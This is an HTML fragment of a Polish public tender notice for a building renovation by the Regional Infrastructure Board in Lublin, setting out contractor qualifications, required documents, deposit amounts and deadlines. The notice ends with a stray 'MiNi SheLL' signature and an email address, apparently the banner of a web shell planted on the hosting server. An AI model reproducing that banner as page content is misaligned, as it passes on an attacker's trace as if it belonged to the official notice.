mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy spełniają określone przez Zamawiającego warunki udziału w postępowaniu dotyczące:<br/>1)	Zdolności do występowania w obrocie gospodarczym:<br/>Warunek ten zostanie spełniony, jeżeli:<br/>Wykonawca wykonujący działalność gospodarczą lub zawodową wykaże, że posiada wpis do jednego z rejestrów zawodowych lub handlowych prowadzonych w kraju, w którym ma siedzibę lub miejsce zamieszkania. <br/><br/>2)	Uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów:<br/><br/>Zamawiający nie określa wymagań w zakresie spełniania tego warunku.<br/><br/>3)	Sytuacji ekonomicznej lub finansowej:<br/><br/>Zamawiający nie określa wymagań w zakresie spełniania tego warunku.<br/><br/>4)	Zdolności technicznej lub zawodowej:<br/><br/>Warunek zostanie spełniony, jeżeli:<br/><br/>A.	Wykonawca wykaże, że w okresie ostatnich pięciu (5) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy – to w tym okresie wykonał: co najmniej jedną (1) robotę budowlaną polegającą na wykonaniu remontu budynku o powierzchni użytkowej minimum 300 m2.<br/>B.	skieruje do realizacji zamówienia publicznego:<br/>a)	co najmniej po jednej (1) osobie posiadającej uprawnienia budowlane do pełnienia samodzielnych funkcji technicznych w budownictwie w zakresie kierowania robotami budowlanymi w każdej z nw. specjalności:<br/>-	konstrukcyjno-budowlanej – uprawnienia bez ograniczeń,<br/>-	instalacyjnej w zakresie sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, wodociągowych i kanalizacyjnych – uprawnienia bez ograniczeń,<br/>	instalacyjnej w zakresie sieci, instalacji i urządzeń elektrycznych i elektroenergetycznych – uprawnienia bez ograniczeń,<br/>zgodnie z art. 14 ust.1 ustawy z dnia 07.07.1994 r. Prawo budowlane oraz Rozporządzeniem Ministra Inwestycji i Rozwoju z dnia 29 kwietnia 2019 r. w sprawie przygotowania zawodowego do wykonywania samodzielnych funkcji technicznych w budownictwie. Wymagana jest przynależność osób wyznaczonych do kierowania robotami budowlanymi do właściwej izby samorządu zawodowego.<br/>b) co najmniej jedną (1) osobę posiadającą aktualne uprawnienia kwalifikacyjne URE w zakresie:<br/>I. eksploatacji urządzeń, instalacji i sieci elektrycznych na stanowisku: „DOZORU”, Grupa 1 – „D1”,<br/>II. eksploatacji urządzeń, instalacji i sieci elektrycznych na stanowisku: „EKSPLOATACJA”, Grupa 1 – „E1” <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1.OŚWIADCZENIE Wykonawcy o aktualności informacji zawartych w Oświadczeniu, <br/>o którym mowa w art. 125 ust. 1 ustawy Pzp w zakresie podstaw wykluczenia <br/>z postepowania wskazanych przez Zamawiającego oraz podstaw wykluczenia <br/>zgodnie z art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach <br/>w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie <br/>bezpieczeństwa narodowego - według wzoru załączonego do SWZ.<br/>2. W przypadku Wykonawcy wobec którego wydano prawomocny wyrok sądu lub <br/>ostateczną decyzję administracyjną o zaleganiu z uiszczeniem podatków, opłat lub <br/>składek na ubezpieczenie społeczne lub zdrowotne, Wykonawca złoży:<br/>dowód potwierdzający, że Wykonawca przed upływem terminu składania ofert dokonał <br/>płatności należnych podatków, opłat lub składek na ubezpieczenie społeczne lub <br/>zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie <br/>spłaty tych należności.<br/>3. W przypadku, gdy należąc do tej samej grupy kapitałowej w rozumieniu ustawy z dnia <br/>16 lutego 2007 r. o ochronie konkurencji i konsumentów, Wykonawcy złożyli odrębne <br/>oferty, Wykonawca złoży:<br/> dowód potwierdzający, że Wykonawcy przygotowali te oferty niezależnie od siebie.<br/>4. Gdy w przypadkach, o których mowa w art. 85 ust. 1, doszło do zakłócenia <br/>konkurencji, wynikającego z wcześniejszego zaangażowania tego Wykonawcy lub <br/>podmiotu, który należy z Wykonawcą do tej samej grupy kapitałowej w rozumieniu <br/>ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów, Wykonawca <br/>złoży:<br/>dowód potwierdzający, że spowodowane tym zakłócenie konkurencji może być <br/>wyeliminowane w inny sposób niż przez wykluczenie Wykonawcy z udziału <br/>w postępowaniu o udzielenie zamówienia.<br/>5. W przypadku Wykonawcy, który naruszył obowiązki dotyczące płatności podatków, <br/>opłat lub składek na ubezpieczenia społeczne lub zdrowotne z wyjątkiem przypadku, <br/>o którym mowa w art. 108 ust. 1 pkt 3:<br/>dowód, potwierdzający iż Wykonawca przed upływem terminu do składania ofert dokonał <br/>płatności należnych podatków, opłat lub składek na ubezpieczenia społeczne lub <br/>zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie <br/>spłaty tych należności;</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">I.	zdolności do występowania w obrocie gospodarczym:<br/><br/>1.	Dokument potwierdzający, że Wykonawca wykonujący działalność gospodarczą lub zawodową jest wpisany do jednego z rejestrów zawodowych lub handlowych, prowadzonych w kraju, w którym ma siedzibę lub miejsce zamieszkania, wystawiony nie wcześniej niż 6 miesięcy od dnia złożenia;<br/><br/>II.	uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile nie wynika to z odrębnych przepisów:<br/><br/>Zamawiający nie żąda dokumentów w ww. zakresie.<br/><br/>III.	sytuacji ekonomicznej lub finansowej:<br/><br/>Zamawiający nie żąda dokumentów w ww. zakresie.<br/><br/>IV.	zdolności technicznej lub zawodowej:<br/><br/>1.	WYKAZ ROBÓT BUDOWLANYCH, wykonanych nie wcześniej niż w okresie ostatnich pięciu (5) lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy, w tym okresie wraz z podaniem ich rodzaju, wartości, daty i miejsca wykonania robót, podmiotów, które wykonały roboty i podmiotów na rzecz których roboty te zostały wykonane – według wzoru załączonego do SWZ;<br/><br/>Obowiązek wskazania przez Wykonawcę w Wykazie robót dotyczy robót, o których mowa w pkt XVII. ppkt 2.4) lit. A. SWZ.<br/><br/>2.	DOWODY dotyczące wykonanych robót określające, czy roboty wskazane w wykazie robót, zostały wykonane należycie.<br/><br/>Dowodami, o których mowa powyżej są referencje bądź inne dokumenty sporządzone przez podmiot, na rzecz którego roboty budowlane były wykonywane, a jeżeli Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów – inne odpowiednie dokumenty.<br/><br/>3.	WYKAZ OSÓB skierowanych do realizacji zamówienia publicznego, w szczególności odpowiedzialnych za kierowanie robotami budowlanymi wraz z informacjami na temat ich kwalifikacji zawodowych, posiadanych uprawnień zawodowych, doświadczenia zawodowego wyrażonego w pełnych latach, niezbędnych do wykonania zamówienia publicznego, a także zakresu wykonywanych przez nie czynności, informacją o podstawie do dysponowania tymi osobami – według wzoru załączonego do SWZ <br/><br/>Wykaz osób powinien obejmować wszystkie osoby opisane w pkt XVII. ppkt 2.4) lit. B. SWZ.<br/>W ww. wykazie należy podać:<br/>	numer, rodzaj i zakres posiadanych uprawnień budowlanych do kierowania robotami budowlanymi, <br/>	podstawę dysponowania osobą,<br/>	numer i termin ważności zaświadczenia kwalifikacyjnego uprawniającego do zajmowania się eksploatacją urządzeń, instalacji i sieci elektrycznych na stanowisku: „DOZORU”, Grupa 1 – „D1”,<br/>	numer i termin ważności zaświadczenia kwalifikacyjnego uprawniającego do zajmowania się eksploatacją urządzeń, instalacji i sieci elektrycznych na stanowisku: „EKSPLOATACJA”, Grupa 1 – „E1” <br/>oraz jednocześnie posiadającą poświadczenie bezpieczeństwa w zakresie dostępu do informacji niejawnych lub pisemne upoważnienie uprawniające do dostępu do informacji niejawnych o klauzuli „ZASTRZEŻONE” wydane przez kierownika jednostki organizacyjnej oraz aktualne zaświadczenie stwierdzające odbycie szkolenia w zakresie ochrony informacji niejawnych.</span> </h3> <h3 class="mb-0">5.9.) Zamawiający przewiduje uzupełnienie przedmiotowych środków dowodowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1.jeżeli dotyczy) OŚWIADCZENIE PODMIOTU UDOSTĘPNIAJĄCEGO <br/>WYKONAWCY ZASOBY, o którym mowa w art. 125 ust. 5 ustawy Pzp, stanowiące <br/>wstępne potwierdzenie, że Podmiot udostępniający Wykonawcy zasoby nie podlega <br/>wykluczeniu, spełnia warunki udziału w postępowaniu w zakresie wskazanym przez <br/>Zamawiającego w odniesieniu do zakresu, w jakim udostępnia Wykonawcy zasoby –<br/>zgodnie ze wzorem załączonym do SWZ – jako załącznik do oferty;<br/>2. PEŁNOMOCNICTWO – do reprezentacji Wykonawcy lub Wykonawców ubiegających <br/>się wspólnie o udzielenie zamówienia w prowadzonym przez Zamawiającego <br/>postępowaniu, w szczególności do złożenia oferty, podmiotowych środków <br/>dowodowych oraz innych oświadczeń i dokumentów oraz zawarcia umowy (jeśli <br/>dotyczy), pełnomocnictwo do reprezentacji podmiotu udostępniającego zasoby (jeśli <br/>dotyczy) - jako załącznik do oferty.<br/><br/>3. ZOBOWIĄZANIE PODMIOTU UDOSTĘPNIAJĄCEGO ZASOBY do oddania <br/>Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji danego <br/>zamówienia lub inny podmiotowy środek dowodowy, potwierdzający że Wykonawca <br/>realizując zamówienia będzie dysponował niezbędnymi zasobami tych podmiotów.<br/>Dokument ten ma określać w szczególności:<br/> zakres dostępnych Wykonawcy zasobów podmiotu udostępniającego zasoby;<br/> sposób i okres udostępnienia Wykonawcy i wykorzystania przez niego zasobów <br/>podmiotu udostępniającego te zasoby przy wykonaniu zamówienia;<br/> czy i w jakim zakresie podmiot udostępniający zasoby, na zdolnościach którego <br/>Wykonawca polega w odniesieniu do warunków udziału w postępowaniu <br/>dotyczących wykształcenia, kwalifikacji zawodowych lub doświadczenia, zrealizują <br/>usługi/roboty budowlane, których wskazane zdolności dotyczą.<br/>Takim dokumentem może być ZOBOWIĄZANIE PODMIOTU UDOSTĘPNIAJĄCEGO <br/>ZASOBY – według wzoru załączonego do SWZ (jeśli dotyczy) - jako załącznik do oferty.<br/>4. OŚWIADCZENIE Wykonawców wspólnie ubiegających się o udzielenie zamówienia<br/>zawierające wykaz robót budowlanych, które zostaną wykonane przez poszczególnych <br/>Wykonawców (jeśli dotyczy) - jako załącznik do oferty. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.Oferta musi być zabezpieczona wadium o niżej wymienionej wartości:<br/>Pakiet nr 1<br/>8 000,00 zł (słownie: osiem tysięcy 00/100 złotych);<br/><br/>Pakiet nr 2<br/>4 800,00 zł (słownie: cztery tysiące osiemset 00/100 złotych);<br/><br/>2. Wadium może być wniesione w jednej lub w kilku następujących formach:<br/>1) pieniądzu;<br/>2) gwarancjach bankowych;<br/>3) gwarancjach ubezpieczeniowych;<br/>4) poręczeniach udzielanych przez podmioty, o których mowa w art. 6 b ust. 5 pkt 2<br/>ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju <br/>Przedsiębiorczości (t.j. Dz.U. z 2024 r. poz. 419 ze zm.).<br/>3. Wadium w formie pieniężnej należy wpłacić przelewem na rachunek bankowy <br/>Rejonowego Zarządu Infrastruktury w Lublinie, 20-020 Lublin, ul. Lipowa 1a, konto nr: <br/>58 1010 1339 0043 0113 9120 1000<br/>Wadium musi być wniesione najpóźniej do godz. 10:00 dnia 11.07.2025 r.<br/>Wniesienie wadium w pieniądzu będzie skuteczne, jeżeli w wyżej wymienionym <br/>terminie znajdzie się na rachunku bankowym Rejonowego Zarządu <br/>Infrastruktury w Lublinie.<br/>4. W przypadku wnoszenia wadium w formie gwarancji lub poręczenia, o których <br/>mowa w pkt XXI ppkt 2.2) - 4) SWZ, Wykonawca przekazuje Zamawiającemu <br/>oryginał gwarancji lub poręczenia w postaci elektronicznej poprzez wczytanie <br/>tego pliku na platformie e-Zamówienia, najpóźniej do godz. 10:00 dnia 11.07.2025r.<br/>Z treści gwarancji (poręczenia) musi jednoznacznie wynikać:<br/>a. jaki jest sposób reprezentacji Gwaranta. Gwarancja musi być podpisana przez <br/>upoważnionego (upełnomocnionego) przedstawiciela Gwaranta.<br/>b. nieodwołalnie i bezwarunkowo - na pierwsze pisemne żądanie zgłoszone przez <br/>Rejonowy Zarząd Infrastruktury w Lublinie, ul. Lipowa 1a, 20-020 Lublin, <br/>w terminie związania ofertą - zobowiązanie Gwaranta do wypłaty <br/>Zamawiającemu, pełnej kwoty wadium w okolicznościach określonych w art. 98 <br/>ust. 6 ustawy Pzp.<br/>5. W przypadku składania oferty przez Wykonawców wspólnie ubiegających się <br/>o udzielenie zamówienia, wadium wniesione przez jednego z Wykonawców (jednego <br/>z konsorcjantów lub wspólników spółki cywilnej) uważa się za wniesione prawidłowo.<br/>6. Oferta Wykonawcy, który nie wniósł wadium, wniósł je w sposób nieprawidłowy lub nie <br/>utrzymywał wadium nieprzerwanie do upływu terminu związania ofertą lub który złożył <br/>wniosek o zwrot wadium, w przypadku o którym mowa w art. 98 ust. 2 pkt 3 ustawy <br/>Pzp, podlega odrzuceniu na podstawie art. 226 ust. 1 pkt 14) ustawy Pzp.<br/>7. Okoliczności i zasady zwrotu wadium, jego zatrzymania oraz zaliczania na poczet <br/>zabezpieczenia należytego wykonania umowy określają odpowiednie przepisy ustawy <br/>Pzp.<br/>8. Złożenie wniosku o zwrot wadium, o którym mowa w art. 98 ust. 2 ustawy Pzp, <br/>powoduje rozwiązanie stosunku prawnego z Wykonawcą wraz z utratą przez niego <br/>prawa korzystania ze środków ochrony prawnej, o których mowa w dziale IX ustawy <br/>Pzp. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> Każdy z Wykonawców wchodzący w skład spółki cywilnej lub konsorcjum musi:<br/>wykazać, że nie podlega wykluczeniu na podstawie art.108 ust. 1, art. 109 ust. 1 pkt 1 i 4 ustawy Pzp oraz art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.<br/>a)	Zamawiający dokonując oceny spełnienia warunku udziału w postępowaniu, o którym mowa w pkt XVII. ppkt 2.1) SWZ uzna, iż warunek został spełniony jeżeli:<br/>-	każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia wykonujący działalność gospodarczą lub zawodową wykaże, że jest wpisany do jednego z rejestrów zawodowych lub handlowych prowadzonych w kraju, w którym ma siedzibę lub miejsce zamieszkania.<br/><br/>b)	Zamawiający dokonując oceny spełnienia warunku udziału w postępowaniu, o którym mowa w pkt XVII. ppkt 2.4) lit. A. SWZ uzna, iż warunek został spełniony jeżeli:<br/>	przynajmniej jeden z Wykonawców wchodzących w skład spółki cywilnej lub konsorcjum wykaże, że wykonał robotę budowlaną, o której mowa w pkt XVII. ppkt 2.4) lit. A. SWZ;<br/>	Zamawiający wymaga, aby część zamówienia związana z warunkiem udziału w postępowaniu została zrealizowana przez tego z Wykonawców wchodzącego w skład spółki cywilnej lub konsorcjum, który wykazał się spełnieniem warunku udziału w postępowaniu;<br/>	Wykonawcy wraz z ofertą złożą Oświadczenie, o którym mowa w pkt XVIII. Etap 1 ppkt 4. SWZ.<br/>2.	Wykonawcy występujący wspólnie muszą ustanowić pełnomocnika (lidera) do reprezentowania ich w postępowaniu o udzielenie niniejszego zamówienia tj.: w szczególności do złożenia oferty, oświadczeń i zawiadomień albo do reprezentowania ich w postępowaniu i zawarcia umowy na wykonanie przedmiotowego zamówienia publicznego.<br/>3.	Wszelka korespondencja dokonywana będzie wyłącznie z pełnomocnikiem (liderem). Wszelkie rozliczenia (wystawianie faktur, płatności) dokonywane będą z pełnomocnikiem lub liderem wskazanym w ofercie lub innych dokumentach/ oświadczeniach złożonych w postępowaniu.<br/>4.	Wypełniając ofertę, jak również inne dokumenty powołujące się na „Wykonawcę&#34;, w miejscu np. „nazwa i adres Wykonawcy&#34;, należy wpisać pełne dane dotyczące wspólników spółki cywilnej lub pełne dane dotyczące lidera i partnera (partnerów) konsorcjum.<br/>5.	Jeżeli została wybrana oferta Wykonawców wspólnie ubiegających się o udzielenie zamówienia, Zamawiający może żądać przed zawarciem umowy w sprawie zamówienia publicznego kopii umowy regulującej współpracę tych Wykonawców.<br/>6.	Zgodnie z art. 117 ust. 4 ustawy Pzp, Wykonawcy wspólnie ubiegający się o udzielenie zamówienia, w przypadku o którym mowa w art. 117 ust. 2 i 3 ustawy Pzp, dołączają do oferty oświadczenie, z którego wynika które roboty budowlane wykonają poszczególni Wykonawcy. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Tak</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> Rodzaj i zakres zmian umowy oraz warunki ich wprowadzania znajdują się we wzorze umowy, który stanowi załącznik do SWZ <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2025-07-11 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">oferty należy składać przy użyciu platformy e-Zamowienia: http://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2025-07-11 12:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal">do 2025-08-09</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy nie podlegają wykluczeniu z postępowania na podstawie art. 7 ust. 1 ustawy z dnia 13 kwietnia 2022 r. o szczególnych rozwiązaniach w <br/>zakresie przeciwdziałania wspieraniu agresji na Ukrainę oraz służących ochronie bezpieczeństwa narodowego.

Creat By MiNi SheLL
Email: jattceo@gmail.com